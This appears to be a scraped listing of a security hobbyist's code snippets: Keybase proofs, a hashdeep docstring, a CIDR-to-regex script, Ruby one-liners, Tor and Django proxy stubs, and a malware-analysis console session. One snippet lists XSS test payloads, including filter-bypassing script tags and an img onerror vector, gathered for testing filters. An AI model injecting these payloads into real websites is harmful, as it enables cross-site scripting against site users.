deadbits

### Keybase proof

I hereby claim:

  * I am deadbits on github.
  * I am deadbits (https://keybase.io/deadbits) on keybase.
  * I have a public key whose fingerprint is 01ED C31F 32E4 5485 EF76  9E25 A88F 2B93 A135 1871

To claim this, I am signing this object:

deadbits

Keybase proof

I hereby claim:

• I am deadbits on github.
• I am deadbits (https://keybase.io/deadbits) on keybase.
• I have a public key whose fingerprint is D65D 4712 2018 9C21 E5D2 13B5 D65E F900 37DD 79AF

To claim this, I am signing this object:

deadbits

"""
Build recursive hash of files in directory tree in hashdeep format.


Hashdeep format description:
http://md5deep.sourceforge.net/start-hashdeep.html

hashdeep.py differences from original hashdeep:

 - if called without arguments, automatically starts to build

deadbits

Functions and Methods (function or method docstrings)
@param p: ...	A description of the parameter p for a function or method. It may appear in the class docstring to describe a costructor parameter: mostly useful for C extensions.
@type p: ...	The expected type for the parameter. p.
@return: ...	The return value for a function or method.
@rtype: ...	The type of the return value for a function or method.
@keyword p: ...	A description of the keyword parameter p. It may appear in the class docstring to describe a costructor keyword parameter.
@raise e: ...	A description of the circumstances under which a function or method raises exception e. It may appear in the class docstring to describe an exception that can be raised by the costructor.

Variables (module, class or variable docstrings)

deadbits

#!/usr/bin/python
''' Not my script, found on the Internet, and rediscovered on my hard drive
'''
import sys

def cidr_to_regex(cidr):
    ip, prefix = cidr.split('/')

    base = 0
    for val in map(int, ip.split('.')):

deadbits

#
# One-liners (or one'ish-liners)
#

### CONVERT a hex file to hex string
# for_testing$ echo -n "DEADBEEFDEADBEEF" > tmp 
File.open("tmp", "rb") {|f| [f.read].pack("H*")} 
# => "\xDE\xAD\xBE\xEF\xDE\xAD\xBE\xEF"

### CONVERT to base64 (note .encode and .strict_encode can have different results)

deadbits

#!/usr/bin/env python
##
# class wrapper for proxy configurations 
# original code by fitblip (http://www.talesofacoldadmin.com/)
# - added tor newnym
# - added get_ip
# - modified tor check function (requests instead of urllib and built-in function)
# - combined functions into class wrapper
# - more to come soon...
#

deadbits

# -*- encoding: UTF-8 -*-

#
# sample django HTTP proxy
#

import urlparse
import requests
import logger

deadbits

Useful XSS techniques taken from the Cross project by thesp0nge @ http://travis-ci.org/thesp0nge/cross

          "<script>alert('pwned!');</script>",
          "/--><script>alert('pwned!');</script>",
          "/--></ScRiPt><ScRiPt>alert('pwned!');</ScRiPt>",
          "//;-->alert('pwned!');",
          "\"//;\nalert('pwned!');",
          "<script/anyjunk>alert('pwned!')</script>",
          "<<script>alert('pwned!');//<</script>",
          "<img onerror=alert('pwned!') src=a>",

deadbits

ams [~/Git/maz/bin] - [master] » ./console.rb                                       

  Malware Analysis Zoo ::: interactive console
	https://github.com/ohdae/maz - MAZ (c) 2013
	type 'help' to view all available commands.

maz >> analyze /home/ams/maz/storage/samples/sample3.exe
[*] starting analysis of sample: /home/ams/maz/storage/samples/sample3.exe
[-] sample copied to storage directory: /home/ams/maz/samples/sample3_a1bbf8ab970131055d0f3c95001c9409/
[*] submitting to database ...